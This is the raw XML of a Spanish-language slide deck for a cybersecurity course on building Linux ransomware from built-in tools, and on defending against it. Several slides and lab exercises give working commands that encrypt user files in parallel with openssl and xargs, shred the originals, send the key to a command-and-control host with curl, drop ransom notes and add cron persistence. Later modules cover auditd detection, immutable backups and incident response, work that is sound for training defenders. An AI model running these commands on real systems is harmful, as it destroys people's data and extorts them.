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10"/>
    <p:sldId id="257" r:id="rId9"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId5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E6223-9951-4C07-BB28-EBDFD07E0C7B}" v="29" dt="2026-03-26T20:12:58.358"/>
    <p1510:client id="{81A3B62C-FA47-485C-A833-D160566C3847}" v="14" dt="2026-03-26T20:28:20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6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide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6/11/relationships/changesInfo" Target="changesInfos/changesInfo1.xml"/><Relationship Id="rId16" Type="http://schemas.microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo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50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hí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:28:20.937" v="92"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp new mod setBg">
        <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:27:33.863" v="82"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3323631973" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:11:11.588" v="1" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3323631973" sldId="256"/>
            <ac:spMk id="2" creationId="{8E57BA16-284B-87D9-1328-3A04FD9A523E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:11:13.445" v="2" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3323631973" sldId="256"/>
            <ac:spMk id="3" creationId="{9DC729C6-47FD-BFF7-4120-3398BE1F388B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:27:24.529" v="80" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3323631973" sldId="256"/>
            <ac:spMk id="4" creationId="{F28A5550-8656-F91B-3480-6DF877DFB6E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:27:24.065" v="79" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3323631973" sldId="256"/>
            <ac:spMk id="5" creationId="{4D406AB0-CBBD-4D10-F7C3-3E93AD524970}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:27:40.653" v="84"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2664452619" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:27:47.371" v="86"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2580145206" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:28:10.746" v="88"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1623305599" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:28:15.756" v="90"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2894258180" sldId="260"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add setBg">
        <pc:chgData name="Anahí Cespedes" userId="6e6bfcc1-2f5b-45d8-a75a-080acfa1fdde" providerId="ADAL" clId="{6D9B3B01-718A-48EF-90B6-2F1F32432EB2}" dt="2026-03-26T20:28:20.937" v="92"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="112443265" sldId="261"/>
        </pc:sldMkLst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CC786-E6E5-9DC7-8EB8-FAF42885C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725854-2AAF-10C0-71EF-957EE766A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3F0373-BDF9-3EA4-0EE2-C117AC38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9BDE00-C4A4-DBA5-09EA-9CF4299F8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3C40B2-BFE3-CE95-26DE-9C9C3D36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105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BC72C-1DE8-E4BB-5F9B-101D6F28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11B6D9-C7CD-5A1E-AAD6-BF7BFA24C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72D61-4EEC-8BDA-949A-0BF1FE96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72A44D-41E0-509A-2BFC-543A3BD8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7E85FC-2229-0862-CB00-6EA7131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897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C4B895-CC97-D01C-5F70-1211B1A4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E706E4-3A24-A1FF-2734-F8632E327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8D1D81-D1C7-A0CA-6B74-CC39ACD4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D70436-E4F4-BDD4-28B8-AFA53415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817444-0B75-AF7A-D5C3-8B26B5E2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463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63B74-401D-21C4-D310-BD466346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DB83A2-C5C2-6E65-A677-DDD000E5D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9ABCC5-A00B-1C64-96A1-4290219C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554B7F-D720-3DD1-600A-B1C3E953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FE9D54-166F-19F9-650C-21A51A81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844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7CEB0-4C97-0E18-60E7-2D1B3ECF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CCF838-00CE-7CBC-B807-92D2B89F3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7EB449-21DA-3A16-8C91-C667D58D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381D83-B0E0-D69C-B2C6-DE6040C6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C02A88-CF25-EDC0-9E35-CA0963EE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03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15901-AEB6-3947-DF4B-07D6066B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6662C6-594E-C137-5935-E7F901A1B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E6CC8E-1026-EC87-7293-916138086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A57BCA-D850-E27A-2D08-ED1DC1F2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397BC2-D744-8ED3-BD0E-051EF434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A44240-76F1-B036-0D72-AFD15713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971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46CE1-7D22-1415-7531-F7F1590B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6DD2F3-A0C1-2911-F28C-0E925E9F2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B240BB-3DD6-2DC2-B136-35A162DDA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D44EC8-24FD-76AE-AA59-7C6C580D8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BA2E25-2FB4-7477-3368-6CEB01E86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493377-E5B1-40DC-256B-21FCDF8D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49E7FDE-F046-B995-5254-DAA82C70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21351E-CD46-D138-9829-F09A5FED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381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8779B-C286-7EC0-010E-714B560C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78E284-4148-828D-5007-431CFFCD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6A8585-F4A1-2218-CBC3-87E99B6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382922-042A-B5CA-4A99-421C8480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242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265DE7-F39B-83E4-DF72-DB6CD0D7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6F3DFE-0A5A-43BC-D402-65974626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63BCBE-9D2C-A41B-69EB-CA992915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244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9D554-EF77-C227-ACA5-AC7F3E72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CFD62A-3DDE-F4F8-E667-F02A278BA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17DAD5-9120-3DFA-22E0-84D6274E3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D828FC-25B3-0E5C-460B-F21D0946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675606-7A1F-65D5-BB61-3E9AB593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99326-3B7B-14C7-3E9A-3679EB75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062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9FD11-3DDF-5486-4CB5-CAC75F2B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E45D61-95BF-B84E-BB35-981EA3221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0A4E19-587C-94D8-9108-C4AD4D4EC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E3B54-EC5C-ED35-84B6-0EFCFF5E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CBDFA2-5D44-D3D0-FEF0-96541D6A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104C23-D906-B697-161F-94DECA01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65426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47A9E4-3148-7C7D-3CD8-DA870D20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8F192F-B12A-B894-0E01-145E9E79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9BED1F-4558-30D0-7B44-345C3192E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6DE7B5-0BC1-9FC2-9E1C-28DB7D223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7B92DF-FB08-7ECA-EF25-A54F5538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631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Que coman tierra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De LOLBINs a ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Diplomados Ciberseguridad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find: el reconocimiento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Mapear todos los archivos de valor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find / -type f -writable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\( -name "*.txt" -o -name "*.pdf"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-o -name "*.docx" -o -name "*.db" \)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-print0 &gt; /tmp/.targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Rápido. Silencioso. Está en cualquier Linux.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xargs: el multiplicador de fuerza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t>find localiza. xargs paraleliza.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Secuencial - un archivo a la vez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while IFS= read -r f; do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openssl enc -aes-256-cbc -in "$f" -out "${f}.enc"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done &lt; /tmp/.targets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/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Paralelo - todos los cores, al mismo tiempo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find /home/victim -type f -writable -print0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openssl enc -aes-256-cbc -pbkdf2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-pass file:/tmp/.key -in {} -out {}.enc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>-P $(nproc) = un proceso por core. En 16 cores: miles de archivos en segundos.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ventana de detección se cierra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t>Benchmark real — root, servidor, xargs -P 36:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Un backup en tiempo real típico tiene una ventana de 5 minutos. El atacante termina antes.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3625200"/>
          <a:ext cx="10515600" cy="24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7886700"/>
              </a:tblGrid>
              <a:tr h="495000"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Fase</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B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Tiempo</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="495000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Reconocimiento de dirs escribibles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&lt; 1s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95000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Reconocimiento de archivos objetivo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&lt; 1s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495000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Cifrado + shred (xargs -P 36)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1m 49s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95000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Notas de rescate en todos los dirs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&lt; 1s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Módulo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r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomía de un ataque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Las 7 fases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lvl="1"/>
            <a:r>
              <a:t>Reconocimiento - find -writable mapea objetivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Generación de clave - openssl rand crea clave efímera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Cifrado paralelo - find | xargs -P cifra todo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Destrucción - shred -u elimina los originales</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Exfiltración - curl envía la clave al atacante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Rescate - echo / wall notifica a la víctima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Persistencia - cron re-cifra lo que se recupere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Generación de clave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Clave AES-256 efímera - 32 bytes aleatorios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KEY=$(openssl rand -hex 32)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>La clave nunca toca disco en claro si se exfiltra inmediatamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Sin clave = sin recuperación.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Cifrado + destrucción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printf '%s\0' "${TARGETS[@]}"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'openssl enc -aes-256-cbc -pbkdf2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-pass pass:$KEY -in "$1" -out "$1.enc"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&amp;&amp; shred -u "$1"' _ %</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>shred sobreescribe el archivo varias veces antes de borrarlo. No hay recuperación forense.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Exfiltración de clave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curl -sk "https://$C2/?k=$KEY&amp;v=$(curl -s4 ifconfig.me)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Una sola petición HTTPS saliente. Difícil de distinguir de tráfico legítimo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Una vez enviada: la víctima no puede descifrar sin pagar.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Persistencia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(crontab -l 2&gt;/dev/null; echo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"*/5 * * * * find /home -type f -writable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-newer /tmp/.key -print0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openssl enc -aes-256-cbc -pbkdf2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-pass pass:$KEY -in {} -out {}.enc")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| crontab -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Cada 5 minutos: cualquier archivo nuevo que aparezca, cifrado.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Módulo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r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab: "Preparando el plato"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 coman tierra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r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De LOLBINs a ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Taller de seguridad ofensiva y defensiva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Entorno del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lvl="1"/>
            <a:r>
              <a:t>VM Ubuntu/Debian aislada (sin red real)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Usuario no-root con home poblado de archivos de prueba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Snapshot limpio listo para restaurar entre ejercicios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Nunca ejecutar fuera de esta VM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Ejercicio 1: Reconocimiento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find /home/victim -type f -writable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\( -name "*.txt" -o -name "*.pdf" -o -name "*.docx" \)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&gt; /tmp/.targets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/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wc -l /tmp/.targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>¿Cuántos archivos encontraste? ¿En cuánto tiempo?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Ejercicio 2: Generar clave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openssl rand -base64 32 &gt; /tmp/.key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cat /tmp/.key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Esta es la clave que "el atacante" se lleva. Sin ella, no hay descifrado.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Ejercicio 3: Sentir la diferencia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t>Primero mide la versión lenta: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time while IFS= read -r f; do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openssl enc -aes-256-cbc -pbkdf2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-in "$f" -out "${f}.enc" -pass file:/tmp/.key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shred -u "$f"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done &lt; /tmp/.targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Luego restaura el snapshot y mide la versión real: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time find /home/victim -type f -writable -print0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'openssl enc -aes-256-cbc -pbkdf2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-pass file:/tmp/.key -in "$1" -out "$1.enc"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&amp;&amp; shred -u "$1"' _ {}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Ejercicio 3: La pregunta clave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t>¿En qué momento hubiera sido posible interrumpirlo?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>while loop: tienes 13 minutos — hay tiempo de detectar el spike de I/O y actuar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>xargs -P 36: tienes &lt; 2 minutos — necesitas detección automática, no humana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>tar | openssl: tienes &lt; 5 segundos — cuando llegas, ya terminó</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Con tarbulk: el único momento de intervención real es antes de que empiece — no durante.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3625200"/>
          <a:ext cx="10515600" cy="24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53571"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Métrica</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B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while loop</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B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xargs -P 36</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B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`tar \</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B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openssl`</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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Tiempo total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13m 40s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1m 49s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4.5s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/>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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Archivos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3.301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3.301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3.470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/>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="F2F2F2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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Archivos/segundo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~4 arch/s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~30 arch/s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~771 arch/s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/>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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Speedup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—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7.5x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182x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/>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="F2F2F2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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Output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3.301 .enc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3.301 .enc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1 blob (29 MB)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/>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353574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Ventana de detección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13 min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&lt; 2 min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&lt; 10 segundos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/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Ejercicio 4: Nota de rescate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find / -type d -writable -print0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'echo "Tus archivos han sido cifrados.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Tienes 72 horas para pagar." &gt; "%/LEEME_URGENTE.txt"'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/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wall /home/victim/LEEME_URGENTE.txt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Ejercicio 5: Persistencia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(crontab -l 2&gt;/dev/null; echo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"*/5 * * * * find /home/victim -name '*.txt'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-newer /tmp/.key -print0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openssl enc -aes-256-cbc -pbkdf2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-pass file:/tmp/.key -in {} -out {}.enc")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| crontab -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Crea un archivo .txt nuevo. Espera 5 minutos. ¿Qué pasó?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Ejercicio 6: Forense post-ataque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¿Qué quedó en auth.log?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grep -E "openssl|shred|xargs" /var/log/syslog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/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¿Qué procesos corrieron?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last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journalctl --since "30 minutes ago" | grep -E "openssl|shred"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/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¿Qué modificó crontab?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cat /var/spool/cron/crontabs/$(whoami)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>¿Hubo alguna señal detectable en tiempo real?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Módulo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r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defensa: cómo no comer tierra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El principio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t>Si entendiste el ataque, entiendes dónde poner los controles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Cada fase del ataque tiene un control defensivo correspondiente.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El escenario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t>"Comer tierra" es lo que sientes cuando descubres que un atacante cifró tus servidores sin instalar nada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Sin malware en disco</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Sin firma que detectar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Sin alerta del antivirus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>¿Cómo es eso posible?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Detección: auditd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Instalar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apt install auditd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/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Vigilar llamadas masivas a openssl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auditctl -w /usr/bin/openssl -p x -k crypto_exec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/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Vigilar modificaciones a crontab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auditctl -w /var/spool/cron -p wa -k crontab_mod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/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Ver alertas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ausearch -k crypto_exec | tail -20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Un spike de 500 procesos openssl en 10 segundos es una alerta real.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Detección: comportamiento, no firma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t>Lo que hay que buscar:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>openssl lanzado por un proceso no esperado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>xargs con -P alto y muchos forks en poco tiempo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>shred ejecutado sobre extensiones de documento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Escritura masiva de archivos .enc en directorios de usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Modificación de crontab fuera de ventanas de mantenimiento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Prevención: backups inmutables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restic con repositorio de solo-escritura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restic -r s3:s3.amazonaws.com/mi-bucket backup /home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/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ZFS snapshot automático cada hora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zfs snapshot tank/home@$(date +%Y%m%d-%H%M)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/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S3 Object Lock - no se puede borrar aunque te roben las credenciales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aws s3api put-object-retention ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>El ransomware cifra lo que puede escribir. No puede borrar un snapshot ZFS ni un Object Lock.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Prevención: mínimo privilegio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Archivos críticos inmutables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chattr +i /etc/passwd /etc/shadow /etc/crontab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/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AppArmor: openssl solo puede leer /tmp y /home/app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/etc/apparmor.d/usr.bin.openssl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/usr/bin/openssl {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/tmp/** rw,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/home/app/** rw,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deny /** w,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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Un proceso que no puede escribir fuera de su directorio no puede cifrar el sistema.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Respuesta: el runbook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lvl="1"/>
            <a:r>
              <a:t>Aislar - desconectar de red, no apagar (la clave puede estar en RAM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Preservar - dump de memoria con avml antes de cualquier acción</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Identificar - ¿la clave fue exfiltrada? revisar logs de red</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Contener - revocar credenciales, limpiar crontabs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Recuperar - restaurar desde snapshot inmutable más reciente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Post-mortem - ¿qué control hubiera parado esto?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Módulo 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r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cierre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Lo que aprendiste hoy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lvl="1"/>
            <a:r>
              <a:t>Los LOLBins convierten el sistema en su propio enemigo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>xargs -P es la diferencia entre minutos y segundos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>El cifrado AES-256 con openssl es trivial desde la CLI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>La defensa efectiva requiere entender el ataque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lección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t>La mejor defensa es saber exactamente cómo te van a atacar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Un blue teamer que nunca ha ejecutado un ataque no sabe qué está buscando.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Recursos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lvl="1"/>
            <a:r>
              <a:t>GTFOBins - catálogo de LOLBins y sus usos ofensivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>LOLBAS - equivalente para Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>MITRE ATT&amp;CK T1486 - Data Encrypted for Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>auditd rules - github.com/Neo23x0/auditd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Tarea: auditar tu propio entorno con auditd. ¿Qué encontraste?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r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Que coman tierra... pero los atacantes."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preguntas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Módulo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r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El problema invisible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Compilar con pandoc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PPTX con plantilla corporativa (recomendado)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pandoc slides.md -t pptx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--reference-doc="../../Red Team.pptx"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-o slides.pptx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/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# reveal.js (para presentar en browser)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pandoc slides.md -t revealjs -s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--highlight-style=monokai \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>-o slides.html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¿Qué son los LOLBins?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t>Living Off the Land Binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Herramientas legítimas del sistema operativo usadas con fines maliciosos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Ya están instaladas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Son de confianza para el OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Los antivirus no las bloquean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Los logs las registran como actividad "normal"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¿Por qué los antivirus no los detienen?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t>Los AV buscan firmas — patrones de código malicioso conocido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>openssl, find, xargs, shred... son binarios firmados, legítimos, cotidianos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>No hay nada que detectar.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Casos reales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lvl="1"/>
            <a:r>
              <a:t>NotPetya (2017): usó wmic y psexec para propagación lateral</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Living off the Land attacks: el 62% de los ataques modernos usan LOLBins (CrowdStrike, 2023)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Ransomware-as-a-Service: los kits más sofisticados evitan dropper ejecutables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>La pregunta incómoda: ¿qué tan fácil es replicarlo?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Módulo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r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El arsenal del sistema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Lo que ya tienes instalado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t>Ninguno de estos necesita instalación.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3625200"/>
          <a:ext cx="10515600" cy="24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7886700"/>
              </a:tblGrid>
              <a:tr h="353571"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Herramienta</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B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Para qué lo usa un atacante</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="8B0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="353571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openssl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Cifrado AES-256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53571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find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Mapear archivos objetivo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353571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xargs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Paralelizar el ataque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53571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shred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Destruir los originales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353571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cron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Persistencia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53574"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curl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>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exfiltrar la clave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997c87f1-bf2b-4103-84c0-26f1c6fed8b2" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="997c87f1-bf2b-4103-84c0-26f1c6fed8b2">
